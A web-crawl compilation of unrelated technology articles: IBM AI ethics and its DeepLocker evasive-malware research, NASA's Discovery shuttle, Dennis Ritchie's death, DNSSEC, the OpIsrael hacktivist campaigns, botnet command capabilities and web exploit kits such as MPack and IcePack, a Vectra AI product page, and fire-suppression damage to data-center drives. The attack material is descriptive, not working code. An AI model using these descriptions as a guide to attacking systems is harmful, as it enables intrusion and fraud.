Barry O’Sullivan, European Artificial Intelligence Association
A study published by Nature, called the Moral Machine experiment, asked 2.3 million people across the globe what they would like the autonomous vehicle to do in this life-or-death situation. It found that people’s ethical values and preferences differed wildly by culture and geographic location.
“There is actually no consensus around what ethical principles should be because they’re very much dependent on societal norms,” says O’Sullivan. “That’s really challenging for AI researchers.”
Ultimately, a self-driving car will never be designed specifically to kill someone, so although the life-or-death choice is an edge case, statistical versions of the trolley problem are likely to occur in the real world.
IBM’s Rossi describes a scenario where you are in a self-driving car travelling in the same lane as a truck travelling in the opposite direction towards your car, while there is also a bicycle travelling parallel to you. The choices are to move closer to the bike to create some space between you and the truck, but in doing so risk hitting the cyclist, or move to the other side which would mean less space between you and the truck. “It’s a matter of increasing one risk over another,” she says.
One solution to overcoming disagreements in ethical opinion is in the transparency of the technology – if we cannot agree on what is ethical, we at least need to know how the system is reaching its conclusions.
Building trust through transparency
To embed this transparency, IBM is proposing the use of factsheets for AI services, which it describes as being similar to food labels in the sense that, when you look at it, you can see the data it was trained on, who trained it, when it was trained, and so on.
The factsheet would be comprised of four main pillars: fairness – using data and models free of bias; robustness – making systems secure; explainability – people need to know what is going on inside the black box; and lineage – providing details of development, deployment and maintenance so the system can be audited throughout its lifecycle.
“We think every AI system, when it’s delivered, should be accompanied by something that describes all the design choices and also how we took care of bias, explainability, and so on,” says Rossi. “We think trust in the tech is achieved by being very transparent, not just about the data policy, but also very transparent on the design choices.”
“In this setup, we believe humans still prevail,” says Noam Slonim, the principle investigator for Project Debater. “Humans rely more on rhetoric, and when we measure it they usually deliver speech better than the system. On the other hand, the system advantage is usually reflected by the fact it can pinpoint high-quality evidence to support its case.”
Francesca Rossi, IBM Research
Due to AI’s ability to search huge amounts of data very quickly, there is potential for Project Debater to be used in assisting human decisions, as it can quickly identify facts and evidence, both in support and opposition to the arguments presented.
The more transparent and explainable the system is, the more those using it for these purposes will be able to trust the information it provides.
Building trust can also be helped if companies act responsibly with the powerful technologies in their hands. This is especially true in the context of rapid technological advancement, according to O’Sullivan. “Just because we can do something with AI, doesn’t mean we should go and do it,” he says.
“Humans ultimately need to be responsible for AI systems. An AI system should never be used as a way of a human being relinquishing or displacing his or her responsibility for taking a decision, so if an AI system is under your control, you are responsible,” adds O’Sullivan.
“Trust in the tech is not enough. You also want the final users to trust whoever produces that technology,” says Rossi. “You need to build a system of corporate responsibility.”
One way IBM is trying to do this is through collaborative initiatives with international bodies, national governments and other organisations developing AI technologies.
“You want to hear the voice of everybody, not just those who produce the AI system, but those communities that are affected by the AI,” concludes Rossi.
Some of the artificial intelligence applications being explored by IBM
One of the AI-powered technologies being explored by IBM Research is a decision support system for patients originally envisioned by digital health company Medgate.
Medgate wants to decentralise and automate the provision of healthcare in Switzerland, and operates a number of consultations and clinics that fit healthcare around the individual.
Its offers teleclinics, for example, which allow patients to have a phone call or video chat with their doctor at any time of day, providing 24/7 access to medical consultations. Since 2000, the company claims to have undertaken 7.4 million of these teleconsultations.
These are accompanied by mini-clinics, which are essentially doctors’ surgeries minus the physical doctor. Instead, the doctor will be present by video, while the patient and a medical assistant have access to the broad range of diagnostic devices available at the clinics.
Both types of clinic are also connected to a partner network of more than 1,700 doctors, 50 clinicians and 200 pharmacies, to which a patient can be referred should they need further medical attention or guidance.
All of these services are integrated through the Medgate app, which, although in essence is a booking app for the consultations and clinics, acts a hub through which patients can organise their healthcare needs.
However, not every patient who uses Medgate’s telefeatures necessarily needs to speak with a doctor. To detect and identify the cases that would best be served by a direct referral, Medgate is enlisting an AI-based chatbot, which essentially acts as an intelligent symptom checker.
Medgate claims this will save 15-20% of its costs in Switzerland.
“This is the pattern of the modern healthcare industry – in hospitals you have 90 doctors and five cooks; the future is 90 doctors, 20 software engineers,” says Medgate CEO Andy Fischer, who admits there are still a number of challenges with the technology.
One of these is technological acceptance by patients and physicians.
“Traditionally, healthcare is something that’s been very personal, it’s embedded in our language. [We think,] ‘When I’m sick, I have to see a doctor’, [but] it should be, ‘When I’m sick, I need to make sure my doctor has enough data to decide’,” says Fischer.
“But it’s such a historical, traditional thing that medicine is something personal.”
Beyond building trust in the technology, there are also direct technical challenges, such as teaching the artificial intelligence contextual information that it cannot get from textbooks. For example, the time of day, how close the patient is to a hospital, how nervous a person is.
“This was, and will be, the major component of our collaboration with IBM,” says Fischer.
IBM Research has also partnered with fragrance and flavourings manufacturer Symrise to create perfume based on AI-generated digital fragrance models.
The technology builds on previous IBM research into using AI to pair flavours for recipe creation. The ML algorithms are used to sift through thousands of raw materials and pre-existing fragrance formulas, which helps it to identify patterns and novel combinations that have never been tried.
On top of this, the technology includes algorithms that can learn and predict what the human response to each fragrance would be, how much of a raw material to use and if there are any materials that can be substituted by another.
Using this data, Symrise and IBM have already created a new perfume, called Philyra, which was generated by AI with the specific design objective of creating a fragrance for Brazillian millennials.
“That’s the part that’s amazing to me – that in 1.7 million formulas, finding something that hasn’t been done before is pretty hard to do,” says David Apel, a senior perfumer at Symrise who has been using the technology.
“The creative process is superfast and very innovative, and very interesting to me because I can still pursue my own methodology of how I create fragrance while she’s [the AI] doing something else in the background,” adds Apel. “She just feeds me ideas, so in that respect it’s a personal assistant that’s never sleeping.”
Developing broad AI that learns across disciplines is a core focus for IBM, which has historically been very active in this space. In 1997, for example, IBM’s Deep Blue system beat the chess world champion, and in 2011 IBM Watson defeated the top champions of US game show Jeopardy!.
Now, Project Debater, which absorbs massive amounts of data from a diverse set of information and perspectives to help it make arguments and well-informed decisions, has been used in a number of live public debates with humans.
“I think it’s fair to say that humans really do not have a chance when facing the machines at board games, but these board games, in my opinion, also represent the comfort zone of artificial intelligence,” says Noam Slonim, the principle investigator for Project Debater.
“In search problems, computers are much, much better than humans, so we can use the computational power to overcome human performance. The AI can use a tactic or logic that humans cannot understand in order to win the game. These observations are not true for debate,” says Slonim.
Unlike with board games, where the victor is clear-cut, the value of arguments is inherently subjective, meaning the AI must adapt its logic to human rationale when arguing a point, and do so extremely quickly in an unscripted manner.
Data-driven speech writing and delivery, listening comprehension that can pick up on the nuances and complexities of human language, and a modelling system that uses human dilemmas to enable principled arguments to be formed are the three capabilities that underpin Project Debater’s ability for unscripted reasoning.
With the shift to machine learning and artificial intelligence is being touted by IBM as the next major progression in IT, researchers have also begun developing a new breed of highly evasive malware that conceals itself until it reaches a specific, pre-programmed victim.
Most security software today is rules based, but AI can circumvent these rules by learning and understanding them over time. The AI model in DeepLocker is specifically trained to behave within the rules it has learnt unless it is presented with a victim-specific trigger.
These triggers include visual, audio and geolocation features. During a demonstration, for example, one of the researchers working on the technology, cryptographer Marc Stöcklin, trained DeepLocker to recognise the face of an IBM employee.
Upon seeing the employee’s face through a laptop webcam, the malware released its malicious payload and infected the machine.
By developing this technology, IBM Research claims it can better understand the cyber threats of the future, likening its method to examining the virus to create a vaccine. | <urn:uuid:7da17b5c-6ac1-4c8e-93d8-ef8358302182> | CC-MAIN-2022-40 | https://www.computerweekly.com/feature/IBM-pushes-the-boundaries-of-AI-but-insists-companies-take-an-ethical-approach | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00515.warc.gz | en | 0.952047 | 3,296 | 3.03125 | 3 |
Just shy of 40 successful space journeys, the NASA shuttle Discovery headed to the International Space Station (ISS) Thursday on a final mission that followed repair problems and bad weather.
Known as “STS-133,” Discovery’s last voyage will take 11 days. The shuttle is delivering a variety of parts and modules to the space station and carrying an interesting hitchhiker –a humanoid robot named “Robonaut 2,” or “R2.”
“Discovery’s final flight involves delivery of a last few components to the ISS,” said Stevens Institute of Technology space systems engineering professor Debra Lepore, former lead engineer for the technical panel of the U.S. Congressional Space Launch Modernization Plan.
“The components can house science experiments, help expand laboratory capabilities, and increase storage space,” Lepore told TechNewsWorld. “Think of them like additional rooms added to a modular home.”
With Discovery in retirement, NASA will shutter its entire shuttle program after two more missions are completed.
U.S. Representative Gabrielle Giffords — recovering from gunshot wounds in a Houston rehabilitation clinic — will watch as her husband Mark Kelly joins the shuttle Endeavour crew for its final flight April 19.
The shuttle Atlantis flies June 28.
Named after a seagoing vessel piloted by 17th century explorer Henry Hudson, Discovery started her career in 1984, going on to a “rich history in human space flight,” NASA Administrator Charles Bolden blogged in a final tribute.
“It was my honor to fly aboard Discovery on the STS-31 mission in 1990, when she brought the Hubble Space Telescope into orbit. And on STS-60, when Sergei Krikalev, the first Russian to fly on an American spacecraft, was a crew member,” he recalled.
With her uplifting history, Discovery kept the flames of space exploration alive in the wake of the Challenger and Columbia shuttle tragedies, wrote Bolden.
“The Discovery is now the oldest operating shuttle, after the very sad loss of Challenger, Columbia, and their crews,” said human space exploration researcher Stephen Braham, Ph.D., who directs the Simon Fraser University PolyLAB.
“Along with the Hubble telescope, Discovery launched many spacecraft, including the Advanced Communication Test Satellite (ACTS),” Braham told TechNewsWorld. “ACTS defined modern Ka-band communications, and was used by my team in the Arctic in 1999, at the NASA Haughton-Mars Project.”
Discovery, in fact, may be the most successful spacecraft in history. She’s carried more crews safely to and from space than any other ship. Among many firsts: She was first to bring a satellite back to Earth; first to have a female pilot at the helm; first to carry the oldest person into space — 77-year-old John Glenn; first to host an African-American space walker; and first to fly a member of Congress into orbit, Utah Senator Jake Garn.
Her final mission, Braham said, “is critical, and involves veteran NASA astronauts for that importance.”
Not only will the team install the last modular ISS components, but they will be “demonstrating the importance of next-generation tele-robotics for future Solar System exploration,” Braham said. “Robonaut 2 will allow us to understand how humans can operate robots to maintain systems in space, and also to explore the surface of Mars, and the moons of Mars.”
After the shuttle program closes this year, “the U.S. will have to rely on Russia for the manned part of the International Space Station until private outfits can come on line,” said UCLA aerospace engineering Ph.D. candidate Lord Cole.
“Because the space shuttle program was such a large part of NASA and its public image, it will be interesting to see what direction they go in,” Cole told TechNewsWorld.
With Russians manning shuttle missions, the ISS may become a national laboratory that allows a much broader array of international partners to conduct “good science,” Stevens’ Lepore explained. “It could change in tandem with private ventures to replace the shuttle program.”
Calling Thursday’s launch “bittersweet,” NASA’s Bolden wrote that he looks to the commercial aerospace industry as a major part of “what the future holds for humans in space. Commercial space is fast becoming a reality.”
For now, however, Bolden wished his crew “Godspeed, on this tough bird’s final voyage.” | <urn:uuid:7646173d-664a-453e-8e34-5a87b71eb503> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/discovery-blazes-one-last-trail-71951.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00515.warc.gz | en | 0.932259 | 995 | 2.859375 | 3 |
Legendary computer scientist and creator of the C programming language Dennis Ritchie has died at the age of 70, leaving behind a legacy that touches virtually every aspect of modern life.
“Dennis was well-loved by his colleagues at Bell Labs and will be greatly missed,” wrote Jeong Kim, president of Alcatel-Lucent Bell Labs, in a statement on Thursday. Ritchie was employed at Bell Labs from 1967 to 2007, though he continued afterward in a consulting role.
Calling Ritchie “one of the most respected researchers from Bell Labs,” Kim went on to list many of the scientist’s key accomplishments, including not just the creation of C and coinvention of the Unix operating system with colleague Ken Thompson, but also the Plan 9 and Inferno operating systems as well.
Ritchie was awarded the 2011 Japan Prize in May, adding to a long list of other awards, including also the Association for Computing Machinery Turing Award in 1983 and the U.S. Medal of Technology in 1999.
Confirmation of the exact date of Ritchie’s death was not available at press time. He had reportedly been ill for some time.
‘It’s Hard to Think of a Bigger Legacy’
News of Ritchie’s death was apparently first revealed to the world on Google+ by Rob Pike, a distinguished engineer at Google who worked with Ritchie on numerous occasions.
“It’s pretty amazing how much of an influence [Ritchie] had,” Pike told TechNewsWorld. “[Steve] Jobs died last week, which was also very sad, but I think Dennis in some ways had a bigger effect on things. All those great things Jobs and his company built were based on C and things derived from C.”
The Internet, too, “is basically a C shop,” Pike noted. “The Linux machines that are the bedrock of the Web and other Unix variants are all written in C; browsers are all written in C or C++; Apache is written in C.
“You’ve got all these operating systems, languages and programs all building on Dennis’ work,” Pike concluded. “It’s hard to think of a bigger legacy.”
‘People Are Still Building on It’
Indeed, “so many of the things we use today are basically programs that are written in C or languages that derived from it,” agreed Brian Kernighan, professor in the department of computer science at Princeton University and coauthor with Ritchie on the classic programming tome, The C Programming Language.
Operating systems, the Internet and even the phone system are “all basically building on things that Dennis did,” Kernighan told TechNewsWorld. “It’s sort of invisible until you start to think about it.”
In some ways “it’s probably surprising that the work that was done 40 some years ago is still so central and critically important, and that people are still using and building on it,” Kernighan added. At the same time, “I think it’s going to stay that way for some while.”
‘Impossible to Overstate the Importance’
It”s “impossible to overstate the importance of the C programming language,” agreed Randal Bryant, dean and university professor with the School of Computer Science at Carnegie Mellon University.
Today, “C, and its successor C++, are the two most important languages for writing programs that require high performance and close control over memory resources,” Bryant told TechNewsWorld. “Most of the world’s code for managing computers and networks and for processing database transactions is written in either C or C++.
“Compilers can generate machine code from C and C++ programs that is as good or better than hand-crafted assembly code,” Bryant added. “In addition, C has had strong influence on more recent languages, including Java.”
‘A Unique Invention That Showed Real Genius’
Avi Rubin, professor of computer science at Johns Hopkins University, is one of the many who cut their proverbial programming “teeth” on Kernighan and Ritchie’s book, and he expressed similar awe at the impact of Ritchie’s work.
“Steve Jobs was such a high-profile person, but I’m a little sad that only the computer people are going to be aware of what we’ve lost now,” Rubin told TechNewsWorld.
“He was the father of Unix, which is the core of Apple’s operating system,” Rubin explained. “Without what he did, the Internet wouldn’t be what it is today, servers and high-performance computing wouldn’t be possible.”
Furthermore, the C language “didn’t have anything to model itself after — it was a unique invention that showed real genius,” Rubin pointed out. “Probably more code was written in the last 25 years in C than in any other programming language.”
In short, he concluded, Ritchie was “one of key people to getting the world to where it is today.”
‘People Need to Know Who He Was’
Ritchie’s work may be taken for granted by many, but there’s been an outpouring of reaction to his death from those in the technology community.
“Dennis Ritchie was the engineer/architect whose chapel ceiling Steve Jobs painted,” wrote Linux fan @cmastication on Twitter, for example.
Elsewhere, an obituary put similar sentiments into programming syntax.
Pike said he’s been impressed by the strength of the tech community’s response.
“He’s not a household name,” Pike said, “but I really think people need to know who he was.” | <urn:uuid:c889264b-6053-4d16-a175-47d980637bdc> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/tech-world-mourns-loss-of-dennis-ritchie-father-of-c-and-unix-73496.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00515.warc.gz | en | 0.969042 | 1,270 | 2.578125 | 3 |
The essence of cybercrime is to defeat the safety systems that are in place. These safety systems or cyber defenses can be virus protection software, intrusion prevention tools, data loss protection tools, or cyber-safety training for employees who use corporate IT resources. There are a wide variety of cyber protection practices and devices. Some of these defenses are more effective than others. The most effective defenses are combinations of multiple tools to help protect networks and information from cybercriminals. Remember, the job of the cybercriminal is to defeat the system in order to gain access to internal network resources. Our job is to make it impossible for hackers to defeat the defenses. | <urn:uuid:e8d625d6-faec-428a-81e7-4a868d264d30> | CC-MAIN-2022-40 | https://www.networkcritical.com/single-post/inviktus-the-unconquerable-one | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00515.warc.gz | en | 0.942396 | 129 | 3.09375 | 3 |
Subnet Mask Cheat SheetRecords Cheat SheetGeoDNS ExplainedFree Network TroubleshooterKnowledge BasePricing CalculatorLive CDN PerformanceVideo Demos
BlogsNewsPress ReleasesIT NewsTutorials
Give us your email and we'll send you the good stuff.
Heather Oliver is a Technical Writer for Constellix and DNS Made Easy, subsidiaries of Tiggee LLC. She’s fascinated by technology and loves adding a little spark to complex topics. Want to connect? Find her on LinkedIn.
The Domain Name System (DNS) is the backbone of the internet. It’s how computers and IoT devices are able to communicate with one another and how users reach an online destination. DNS got its start in 1983, but a lot’s changed in 38 years. In fact, since 1995, internet users have increased from 16 million or 0.4% of the world to a staggering 4.66 billion users as of January 2021—that’s 59.5% of the global population.
That’s where DNS Security Extension (DNSSEC) comes in. Such an enormous growth in internet usage calls for greater security measures. While the original DNSSEC technology was actually released in 1997, it wasn’t until 2005 that it evolved into the DNSSEC that’s commonly used today.
The nitty-gritty on DNSSEC is that it creates cryptographic signatures for existing DNS records. This is achieved with private and public signing keys that validate query responses. When DNSSEC is set up for a domain, resolvers can compare digital signatures and confirm that the DNS record request is coming from an authoritative nameserver. This not only proves the integrity of the data, but also ensures that the request wasn’t altered or contains a fake record.
A DNSSEC-enabled zone is secured by grouping all DNS records of the same type into a Resource Record Set (RRset). Rather than the individual records, the RRsets are what is digitally signed.
DNSSEC uses digital signatures that are based on public key cryptography. Each DNS zone for a domain with DNSSEC enabled has a public and a private key, which is used to sign or authenticate the DNS data for that particular zone.
As you might have guessed, a private key holds material privy only to the zone owner. This protects sensitive data needed to authenticate DNS records. The public key, on the other hand, is published in the DNS zone, and is there for any recursive resolver to retrieve. Once data is validated, the request is then sent to the end user. If the request fails to authenticate, a user will receive an error message.
The KSK represents a public/private key combination and is what is used to validate the ZSK. This key is a long-term key (replaced annually) and is always tied to a host zone—it can’t exist without it. The KSK signs the public portion of the ZSK.
The ZSK key corresponds with the private key in a DNS zone and is a short-term key as it is changed more often (usually quarterly) than a Key Signing Key (KSK). This key is used to sign and verify the non-key records of a domain’s DNS zone.
Ultimately, DNSSEC is based on trust. Keys
DNSSEC introduces several new record types that handle signature validation and that hold the cryptographic signatures that work alongside all common DNS record types. These records are:
Tip: DNS Viz is a helpful tool for validating or troubleshooting the DNSSEC of a specific zone. It provides you with a visual analysis of the authentication chain, its resolution path, and lists configuration errors.
DNSSEC can play an important role in DNS security, especially for corporate organizations in the financial or medical sectors or those that handle sensitive personal information, as well as domains that are at high risk for cyberattacks. It’s worth mentioning, however, that implementation requires extra care in order to avoid resolution problems. Furthermore, DNSSEC doesn’t protect against DDoS or other types of cyberattacks, so you still want to make sure all your bases are covered.
If you liked this, you might find these helpful:
Sign up for news and offers from Constellix and DNS Made Easy | <urn:uuid:6ffcb4bf-0f30-4f22-ad73-8ad27d68f8f8> | CC-MAIN-2022-40 | https://constellix.com/news/what-is-dnssec | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00515.warc.gz | en | 0.91237 | 930 | 2.890625 | 3 |
A biometric technology that authenticates users on the Basis of vein pattern recognition rather than iris scans or fingerprint readers. The world’s first “Contactless Vein Authentication” technology developed by Fujitsu offers even more security and ease of use and overcomes previous problems related to security concerns. It accurately identifies an individual using the complex vein pattern in the palm of their hand. The technology is incredibly secure – only granting access if blood is flowing through the circulatory system. It is now able to be used in a wide range of situations thanks to reductions in size, reductions in cost, and simplification of development. | <urn:uuid:12cc3e0f-d7a0-441c-9548-3024fa176643> | CC-MAIN-2022-40 | https://identytech.com/palm-vein-recognition/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00515.warc.gz | en | 0.922235 | 128 | 2.578125 | 3 |
OpIsrael Cyber Attack
Operation Israel refers to a series of cyber attacks that occur each year in early April, and are carried out by pro-Palestinian hackers, who identify as part of the Anonymous group.
History of OpIsrael attacks
The first attack began in 2013 and was planned for Holocaust memorial Day – April 7, 2013. The website of the “Bigger Than Life” organization, which accompanies families whose children are diagnosed with cancer, was attacked and its home page was vandalized with antisemitic and anti-Israel messages. Other sites such as Yad Vashem, the Ministry of Defense, the Election Commission and the Ministry of Foreign Affairs were shut down for several hours.
The attack was also accompanied by false reports published by the hackers, including damages worth 5$ billion allegedly caused.
A group of hackers calling themselves “Anonymous-Arab” announced a denial of service attacks against Israeli websites. E-mail addresses and passwords belonging to the Israeli Export Institute were also published, according to the attackers. The Export Institute stated in response that this is an old list of addresses that can be easily found on the website and that the passwords published are incorrect. In addition, a list of more than 1,300 e-mail addresses from various sources combined with passwords was published, and users were advised to change their passwords following the attack.
On March 29 pro-Palestinian hacker organizations that belonged to the international hacker group, Anonymous announced a cyber attack that would also be coordinated on April 7 of that year. The attack came in response to Operation Resilient Cliff.
As part of the threat, the spokesman announced that they intended to bring down military and government sites on the day of the attack.
In the days leading up to the attack, Meretz, a left-wing party, experienced a hack that transformed their website homepage and implanted pro-Palestinian messages.
The main attack came on April 7, 2015, during which personal details such as e-mail accounts, credit card numbers and Facebook accounts were leaked, most of which are inactive or incorrect. The sites mainly affected by the attack were musicians’ official sites and a few others.
Types of OpIsrael attacks
Popular among hackers and involved in 22% of all cyberattacks, a ransomware attack begins with the installation of malicious software. This malware is designed to lock our data and hold it “captive” until the hacker’s demands are fulfilled. The malware can encrypt the information or lock our device, thus preventing us from access.
There are several types of ransomware:
Encryption- This type of malware locates files that seem important to the user – texts, documents, images, PDFs and more. It encrypts the information, thus preventing access to it. When the victim is an individual, the ransom usually amounts to several hundred dollars, and the requirement includes a transfer of the payment up to 72 hours, otherwise, the data is permanently deleted.
Lock- When the user is locked out of the device, and the ransom message appears on the screen.
Scareware- Perhaps the most cynical of them all, this attack mimics software that scans for security issues, such as antiviruses, and alerts us of critical findings. The error messages that appear to detect faults mimic legitimate antivirus software, and give a sense of reliable source by providing the IP address and geographic location information, or using the names of reputable and trusted companies. Afterward, access is denied until the victim allows the malware to repair these issues, for an additional fee.
DoxWare- Ransomware that threatens to leak victims’ data to sites on the Dark Web. the attacker might sell this information or leak it to sites for free.
Utilizing security vulnerabilities in websites
Exploiting security vulnerabilities in websites in order to infiltrate databases that contain sensitive information such as usernames, passwords, email addresses, residential addresses, and credit card information.
SQL is very similar to its predecessor, the XSS, only it tries to retrieve information from the site’s database. The SQL attack also injects code into sensitive places on the site for example form fields and search fields, and when performed on an unprotected site can retrieve information from the site database such as usernames and passwords.
DDOS service denial
An attempt to make an Internet service – like a website – unavailable to its users, usually by temporarily disrupting the server on which the site is located. There are many types of DDoS, but the essence is flooding the site and its server with malicious traffic that will cause it to shut down due to overload, sometimes by using many devices that were once hacked and exploited without the knowledge of the device owner. Hackers have been perfecting these attacks by using AI (artificial intelligence). But not all is bleak in our future, and artificial intelligence can be used to look for the vulnerabilities of the systems, especially if there is a large amount of information.
SMS and panic calls
Events of this kind are intended to cause the public to panic, during OpIsrael 2015 SMS messages were sent to a large number of Israelis.
Replacing the home page of a particular site with a low level of security. Instead of a proper home page, there will be abusive sentences, political slogans, or any other message that a hacker wants to convey. | <urn:uuid:b61f2b02-6d3b-459a-aa1e-0ead7d80d896> | CC-MAIN-2022-40 | https://redentry.co/en/blog/opisrael-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00515.warc.gz | en | 0.959249 | 1,185 | 2.84375 | 3 |
Botnets are moving toward a more P2P-like communication strategy, but there remain ‘nets which rely on a single server. Bots have been spotted running on compromised Web servers, too, so that they can easily exploit browser vulnerabilities on their victims. Code running on a Web server can be considered a “server side” of botnets, and so can an actual bot server. In this article, we would like to explore what capabilities a bot server has, as well as talk about some Web exploitation kits.
Command and Control
Regardless of the fact that P2P technologies are starting to be used for communication between bots, it is still useful to understand how the less evolved bots function. The new P2P-enabled bots have the same functionality at their core, so the concept is the same.
A bot herder who controls a bot server (or multiple servers) has at his disposal a number of interesting tools. We briefly talked about what botnets are used for in the introduction to this series, but now let’s take a more detailed look at the actual commands a server can send to bot clients.
Botnets have various capabilities, including denial of service attacks, spam relays, and theft of personal information. They even start Web servers on infected computers to aid in phishing attacks. Here’s a brief list of a few of the more interesting things bots can be instructed do:
- Start flooding a specific IP or network using TCP, UDP, or ICMP
- Add/delete Windows services from the registry
- Test the Internet connection speed of the infected computer
- Start the following services: http proxy, TCP port redirector, and various socks proxies
- Run their own IRC server, becoming a master for other bots to connect to
- Capture or “harvest”: CD Keys from the Windows registry, AOL traffic including passwords, and the entire Windows registry itself
- Scan and infect other computers on the local network
- Send spam
- Download and execute a file from a given FTP site
Moreover, if that was not horrific enough for you, consider the following: all of the IRC bots have modular capabilities. Therefore, if someone programs a new module to extend the bots’ capabilities, the owner of the botnet simply runs a single command to install and use the new module on every bot.
Web Exploitation Kits
These kits allow the attacker to gain control of a client machine when it visits a malicious Web page. The most common avenue of attack is via browser vulnerabilities. The attacking code will instruct the Web browser to download and execute malicious code without the user even knowing. It isn’t always a matter of “stupid user that clicked yes,” which is why it is so important to install patches as soon as they are released.
It is extremely rare for attack code to be part of the initial exploit. Instead, it generally instructs the victim browser to download the exploit from another server. A malicious Web page doesn’t generally host the exploit, probably because it’d be reported even more quickly. The server hosting the actual exploit is generally a Web server that was running some piece of PHP (or other) code that allowed someone to secretly upload whatever they wanted. This is caused by mistakes in server configuration, Web application programming errors, or sometimes just plain old security holes in the underlying technologies used.
Of course, attackers need to be able to keep track of which IPs they have compromised. MPack and IcePack are the two most popular kits available. They both provide the user with a Web interface and configuration options to set up a “downloader.” The downloader is the program that gets run on exploited machines after an attack has succeeded. The downloader will fetch and execute malware from wherever it’s configured to do so, and it can use encryption to avoid network-based detection.
These Web kits provide attackers with a neat Web page to view statistics about their attack progress. It provides information about how successful the attack is, as well as lists of already-compromised IP addresses. This excellent honeynet.org paper describes the process in more detail, but suffice it to say, this is extremely trivial stuff. Anyone who gets a hold of IcePack, for example, can quickly begin compromising their Web site visitors’ computers. No skill, and no knowledge of the actual exploits is required.
Compromised Web servers, regardless of color or race, pose a great threat to overall Internet safety. Vulnerable applications exist on every type of Web server, and the underlying OS does nothing to prevent simple exploits from taking place.
Simple exploits, like inserting a little text into a site, used to be pretty innocent. Script kiddies, as they were called, would run other peoples’ exploits and deface sites with obscene text or their groups’ markings. Every once in a while they would try running some code to open a backdoor into a Unix server, which allowed them access as the user the Web server ran as. But now, with botnets and automated attacks, a simple exploit like this is pretty serious.
Web servers play a huge role in the initial infection, re-infection, and maintenance of botnets. Very often the “downloader” provided by the Web exploitation kits will be used to install bot client software. This is likely an extremely effective method of expanding a botnet, since network-based attacks can be blocked and are more likely to be patched.
Fixing all Web server holes won’t stop users from getting infected by any means, but understanding the role of exploited Web servers in the malware ecosystem helps us learn how to fight it. | <urn:uuid:02a50df4-0a57-4bc1-a37b-ecd54f1f2a72> | CC-MAIN-2022-40 | https://www.enterprisenetworkingplanet.com/security/the-botnet-ecosystem-compromised-servers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00515.warc.gz | en | 0.935107 | 1,171 | 2.9375 | 3 |
On a basic level, artificial intelligence (AI) security solutions are programmed to identify “safe” versus “malicious” behaviors by cross-comparing the behaviors of users across an environment to those in a similar environment. This process is often referred to as “unsupervised learning” where the system creates patterns without human supervision. For some AI platforms, like Vectra, “deep learning” is another key application for identifying malicious behaviors. Inspired by the biological structure and function of neurons in the brain, deep learning relies on large, interconnected networks of artificial neurons. These neurons are organized into layers, with individual neurons connected to one another by a set of weights that adapt in response to newly arriving inputs.
Sophisticated AI cybersecurity tools have the capability to compute and analyze large sets of data allowing them to develop activity patterns that indicate potential malicious behavior. In this sense, AI emulates the threat-detection aptitude of its human counterparts. In cybersecurity, AI can also be used for automation, triaging, aggregating alerts, sorting through alerts, automating responses, and more. AI is often used to augment the first level of analyst work.
AI security solutions are able to identify, predict, respond to, and learn about potential cybersecurity threats, without depending on human input. Sophisticated AI security tools can:
AI cybersecurity provides many benefits to companies and their existing IT and security teams. A few of the most high-value benefits include:
When deciding on an AI security vendor, it is essential to ask the correct questions to evaluate whether or not that vendor provides an AI driven cybersecurity solution that can effectively protect your network. Below are nine of the best questions to ask and reflect on:
As enterprises are beginning to implement AI technology in their cybersecurity infrastructure, malicious actors are staying up to date and begin to adapt their methods to stay off the radar. Cybercriminals have the chance to figure out the solution’s threat flagging mechanism, allowing them to modify their attack’s strategy to avoid detection and increase the speed of attacks.
Thanks to automated detection capabilities, AI cybersecurity tools enable enterprises to identify, locate, quarantine, and remediate threats more efficiently.
With the development of machine learning technologies, AI is set out to become an integral part of cybersecurity. Though AI might not take over cybersecurity completely, it will be able to manage a network’s safety with minimal supervision.
There aren’t any inherent downsides to using AI for cybersecurity. The potential issues arise when cybersecurity experts start relying solely on the technology to hunt and fix threats.
As a leader in network detection and response (NDR), Vectra AI protects your data, systems and infrastructure. Vectra AI enables your security operations center (SOC) team to quickly discover and respond to would-be attackers—before they act. Vectra AI rapidly identifies suspicious behavior and activity on your extended network, whether on-premises or in the cloud. Vectra will find it, flag it, and alert security personnel so they can respond immediately. Vectra AI is Security that thinks®. It uses artificial intelligence to improve detection and response over time, eliminating false positives so you can focus on real threats. | <urn:uuid:c9a6f9da-b78c-49e6-bbbc-29aef87c8663> | CC-MAIN-2022-40 | https://www.vectra.ai/learning/ai-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00515.warc.gz | en | 0.92287 | 665 | 3.03125 | 3 |
Data centers have had a problem with fire suppression systems. While trying to remove the threat of fire damage, they have actually introduced dangers of their own. These systems operate by flooding the data center with inert gas, preventing fire from taking hold. However to do this, they have to fill the space quickly, and this rapid expansion can create a shockwave, with vibrations that can damage the hard drives in the facility’s storage systems.
A year ago, this happened in Glasgow, where a fire suppression system took out the local government’s email systems. And in September ING Bank in Romania was taken offline by a similar system. At the bank, there wasn’t even a fire. The system wrecked hard drives during a planned test of the fire suppressions system - one which had been unwisely scheduled for a busy lunchtime period.
A recurring problem
These are just the incidents we know about. Ed Ansett of i3 has told us that this same problem has occured on many occasions, but the data centers affected have chosen not to share the information.
It’s also likely these faults will happen more frequently as time passes, because hard drives are evolving. To make higher capacity drives, vendors are allowing read/write heads to fly closer to the platters. This means they can resolve smaller magnetic domains, and more bits can fit on a disk. These drives have a smaller tolerance to shaking.
